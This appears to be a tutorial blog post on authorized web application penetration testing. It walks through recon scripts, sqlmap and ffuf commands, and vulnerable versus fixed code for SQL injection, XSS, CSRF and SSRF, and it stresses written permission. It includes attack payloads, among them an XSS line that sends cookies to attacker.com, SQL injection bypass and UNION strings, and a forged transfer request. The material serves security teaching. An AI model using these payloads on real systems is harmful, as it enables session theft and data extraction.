If you’ve ever wondered what happens on the “other side” of web security—where the good guys break things intentionally—you’re about to embark on a fascinating journey. Ethical hacking for web applications is essentially the art of thinking like a criminal to prevent actual crimes. It’s authorized chaos in a structured format, and unlike actual hacking, nobody sends you to jail. Pretty sweet deal, right?
Why Should You Care About Web Application Security?
Before we dive into the nitty-gritty of exploitation techniques, let’s establish why this matters. Web applications are everywhere—your banking app, social media, that weird SaaS tool your company pays $500/month for. Each one is a potential goldmine for attackers or a potential liability for companies that didn’t think through their security. The truth is uncomfortable: most web applications have vulnerabilities. Not “might have,” but almost certainly do. The OWASP Top 10 vulnerabilities have been plaguing web apps for nearly two decades, and they’re still showing up in production code like unwanted relatives at Thanksgiving dinner. Ethical hackers fill a critical gap. We’re the authorized attackers who find the vulnerabilities before the malicious ones do. It’s preventative medicine for your digital infrastructure.
Understanding Your Mission: The Ethical Hacking Framework
Before you even think about exploiting anything, you need to understand the legal and ethical landscape. Ethical hacking only works when it’s truly authorized. Get written permission. Get it in writing. Seriously, don’t skip this step unless you want your career to take an unexpected detour. A proper web application penetration test follows a structured methodology, typically based on the OWASP framework. The general flow looks something like this:
Each phase builds on the previous one, and skipping steps is how junior pentesters miss vulnerabilities that senior pentesters charge thousands to find.
Phase 1: Reconnaissance - The Art of Pretending to Be a Lost Tourist
Reconnaissance is where you gather intelligence about your target without raising suspicion. Think of it as stalking, but the legal kind.
Passive Reconnaissance
Passive reconnaissance means collecting information without directly interacting with the target system. You’re basically using Google like a detective. Things to investigate:
- Domain information using WHOIS lookups
- DNS records and subdomains
- Public repositories on GitHub (developers love accidentally committing API keys)
- Social media and employee information
- Job postings (yes, they reveal tech stacks)
- Cached pages and web archives
- SSL certificate history Here’s a practical bash script to gather some initial information:
#!/bin/bash
# Passive reconnaissance script
TARGET="$1"
if [ -z "$TARGET" ]; then
echo "Usage: $0 <domain>"
exit 1
fi
echo "[*] WHOIS Information:"
whois "$TARGET" 2>/dev/null | grep -E "Registrant|Admin|Tech|Created|Expires" | head -10
echo -e "\n[*] DNS Records:"
dig "$TARGET" +short
dig "$TARGET" MX +short
dig "$TARGET" NS +short
echo -e "\n[*] Subdomains (using common patterns):"
for sub in www mail ftp admin api dev staging; do
dig "$sub.$TARGET" +short 2>/dev/null | grep -v "^$" && echo "$sub.$TARGET"
done
echo -e "\n[*] Testing for common paths:"
curl -s -I "https://$TARGET/robots.txt" | head -1
curl -s -I "https://$TARGET/.well-known/security.txt" | head -1
curl -s "https://$TARGET/sitemap.xml" | head -5
Active Reconnaissance
Once you have written authorization, active reconnaissance involves directly probing the target. This is where tools like BurpSuite Pro and ZAP come into play. You’re going to:
- Perform port scanning
- Identify web servers and technologies
- Map the application structure
- Discover hidden endpoints
# Subdomain enumeration using ffuf
ffuf -w /path/to/wordlist.txt -u "https://TARGET/FUZZ" -mc 200,301,302
# More aggressive version for authorized tests
ffuf -w /path/to/wordlist.txt -u "https://TARGET/FUZZ" -mc 200,301,302,401,403 -c -v
Phase 2: Understanding Common Web Application Vulnerabilities
Now we get to the fun part—the vulnerabilities themselves. Let’s explore the OWASP Top 10 through a practical lens.
SQL Injection: The Grandfather of All Vulnerabilities
SQL injection is ancient in internet years, yet it’s still everywhere. It happens when user input is improperly sanitized and concatenated directly into SQL queries. Vulnerable Code (PHP - Bad Pattern):
<?php
$username = $_POST['username'];
$password = $_POST['password'];
// DON'T DO THIS - EVER
$query = "SELECT * FROM users WHERE username = '" . $username . "' AND password = '" . $password . "'";
$result = mysqli_query($conn, $query);
?>
An attacker could input: ' OR '1'='1 for username, completely bypassing authentication.
Testing for SQL Injection:
# Using sqlmap to identify SQLi vulnerabilities
sqlmap -u "https://target.com/login.php" --data="username=test&password=test" -p username --risk=1 --level=1
# More aggressive testing
sqlmap -u "https://target.com/search.php?query=test" -p query --risk=3 --level=5 --batch
Secure Implementation (PHP - Good Pattern):
<?php
$username = $_POST['username'];
$password = $_POST['password'];
// Use prepared statements
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$result = $stmt->get_result();
?>
Cross-Site Scripting (XSS): JavaScript’s Evil Twin
XSS occurs when an attacker injects malicious JavaScript into a web page. There are three main types: 1. Reflected XSS - The attacker tricks a user into clicking a malicious link:
https://target.com/search.php?q=<script>alert('XSS')</script>
2. Stored XSS - The payload is saved in the database and executed for every user:
<!-- Vulnerable comment form -->
<form method="POST" action="/submit_comment.php">
<textarea name="comment"></textarea>
<button type="submit">Post</button>
</form>
<!-- If comment isn't sanitized: -->
<!-- An attacker submits: <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> -->
3. DOM-based XSS - Vulnerable client-side JavaScript code:
// Vulnerable JavaScript
document.getElementById("output").innerHTML = userInput;
// Better approach
document.getElementById("output").textContent = userInput;
Prevention Best Practices:
<?php
// Escape output
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
// Use content security policy headers
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
// Validate and sanitize input
$clean_input = filter_var($user_input, FILTER_SANITIZE_STRING);
?>
Cross-Site Request Forgery (CSRF): The Sneaky Impersonator
CSRF tricks an authenticated user into performing unwanted actions. It’s the digital equivalent of forging someone’s signature.
Attack Scenario:
A user is logged into their bank at bank.com. They visit evil.com, which contains:
<!-- Hidden form submission -->
<img src="https://bank.com/transfer.php?amount=1000&to=attacker_account" />
Prevention with Token-Based Defense:
<?php
// Generate token
session_start();
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
// In the form
<form method="POST" action="/transfer.php">
<input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
<input type="number" name="amount" required>
<button type="submit">Transfer</button>
</form>
// Verify token
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (!hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
die('CSRF token validation failed');
}
// Process transfer
}
?>
Server-Side Request Forgery (SSRF): Making the Server Your Puppet
SSRF allows an attacker to make the server make requests on their behalf. This can expose internal services or credentials. Vulnerable Code:
import requests
@app.route('/fetch_url')
def fetch_url():
url = request.args.get('url')
response = requests.get(url) # Dangerous!
return response.text
An attacker could request: /fetch_url?url=http://localhost:8080/admin
Secure Implementation:
import requests
from urllib.parse import urlparse
@app.route('/fetch_url')
def fetch_url():
url = request.args.get('url')
# Whitelist allowed domains
parsed = urlparse(url)
allowed_domains = ['api.example.com', 'cdn.example.com']
if parsed.netloc not in allowed_domains:
return 'Forbidden domain', 403
# Block private IP ranges
if parsed.hostname in ['localhost', '127.0.0.1', '0.0.0.0']:
return 'Private IP addresses not allowed', 403
response = requests.get(url, timeout=5)
return response.text
Phase 3: The Toolkit - Your Digital Lockpicks
Professional ethical hackers don’t reinvent the wheel. They use industry-standard tools:
Burp Suite Pro
The Cadillac of penetration testing tools. It intercepts traffic, analyzes requests, and has a massive vulnerability scanner. If you’re serious about web app testing, you need this. Basic workflow:
- Configure your browser proxy to route traffic through Burp
- Browse the target application
- Review captured requests in the HTTP history
- Modify and resend requests to test for vulnerabilities
- Use the Scanner for automated vulnerability detection
OWASP ZAP
The open-source alternative to Burp Suite. It won’t make you bankrupt, and it’s surprisingly capable.
# Start ZAP in daemon mode
zaproxy.sh -cmd -config api.disablekey=true &
# Perform an active scan
curl "http://localhost:8080/JSON/ascan/action/scan/?url=https://target.com"
ffuf - Fuzz Faster U Fool
Perfect for discovering hidden directories and parameters:
# Directory brute forcing
ffuf -w /usr/share/wordlists/common.txt -u "https://target.com/FUZZ" -mc 200
# Parameter fuzzing
ffuf -w /usr/share/wordlists/params.txt -u "https://target.com/api/user?FUZZ=value" -mc 200
Nuclei - Template-Based Vulnerability Scanner
Nuclei runs pre-written vulnerability checks against your target:
# Install nuclei
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
# Run against target
nuclei -u "https://target.com" -tags owasp,cve
Phase 4: Putting It All Together - A Practical Penetration Test Workflow
Let me walk you through a complete scenario. Imagine you’re testing a small SaaS application:
Step 1: Reconnaissance & Mapping
# Identify technologies
curl -I https://target.com | grep -i "Server"
# Check for interesting headers
curl -I https://target.com | grep -iE "X-Powered-By|X-AspNet-Version|Server"
# Extract JavaScript files and analyze them
curl -s https://target.com | grep -oE 'src="[^"]*\.js' | cut -d'"' -f2 | sort -u
Step 2: Scanning with BurpSuite
- Configure browser proxy
- Walk through application features (login, search, upload, settings)
- Review all captured requests
- Run BurpSuite Scanner on high-value endpoints
Step 3: Manual Testing - The Real Value
Automated scanners find low-hanging fruit. Manual testing finds the logic flaws:
# Test authentication bypass
# Try various payloads:
# - username=admin&password=anything
# - username=admin' --&password=anything
# - username=admin&password=anything' OR '1'='1
# Test authorization flaws
# If you can view user ID 1, try user ID 2, 3, etc.
# If you can access /user/profile/123, try /user/profile/124
# Check for insecure direct object references
curl "https://target.com/api/invoice/1001" # Works
curl "https://target.com/api/invoice/1002" # Another user's invoice?
Step 4: Exploitation
When you find a vulnerability, document it:
# SQL Injection example
# Found vulnerable parameter: search
curl "https://target.com/search?q=test' UNION SELECT NULL,NULL,user() --"
# XSS example
# Submit to comment field: <img src=x onerror="alert('XSS')">
# CSRF example
# Create proof of concept HTML file with form submission
Phase 5: Reporting - Where You Translate Chaos into Business Value
The exploitation was fun, but the report is what matters. Your findings need to be:
- Clear - Explain what was found
- Reproducible - Give exact steps to reproduce
- Prioritized - Rate by severity (Critical, High, Medium, Low)
- Actionable - Suggest fixes, not just “use HTTPS” Sample Report Section:
Vulnerability: SQL Injection in Search Functionality
Severity: Critical
Location: GET /search?query=
Description: User input in the query parameter is not properly sanitized
before being used in SQL queries, allowing an attacker to extract
sensitive information.
Proof of Concept:
GET /search?query=test' UNION SELECT user(),database(),version() --
Recommended Fix:
Use parameterized queries (prepared statements) for all database operations.
Example (PHP):
$stmt = $conn->prepare("SELECT * FROM products WHERE name LIKE ?");
$stmt->bind_param("s", "%".$_GET['query']."%");
$stmt->execute();
Best Practices for Ethical Hackers
1. Always Get Authorization Seriously. Get it in writing. Have it signed by someone with authority. 2. Know the Scope Understand exactly what you can and cannot test. Don’t accidentally test their email server when you’re supposed to test the web app. 3. Document Everything Screenshots, requests, timestamps, everything. This protects both you and the client. 4. Test in Development First If possible, test in a non-production environment. Breaking production is bad for your resume. 5. Clean Up After Yourself Remove any test accounts, files, or changes you made. Leave no trace except the report. 6. Report Responsibly Don’t disclose vulnerabilities publicly until they’re fixed. Give the client reasonable time to patch. 7. Keep Learning The vulnerability landscape changes monthly. New attack vectors appear constantly. Subscribe to security feeds, practice regularly, and always stay curious.
The Journey Ahead
Ethical hacking for web applications is part art, part science, and entirely fascinating. It requires technical knowledge, creative thinking, and ethical discipline. The good news? These skills are increasingly valuable in an increasingly digital world. Start with practice environments like DVWA (Damn Vulnerable Web Application), HackTheBox, or TryHackMe. Build your skills in a low-stakes environment before offering professional services. Get certified if that matches your career goals (CEH, OSCP, and GWAPT are respected in the industry). Remember, ethical hackers aren’t breaking things—we’re building a safer internet, one vulnerability at a time. And honestly, that’s a pretty cool way to spend your career. Now stop reading and go set up that practice lab. The internet isn’t going to secure itself.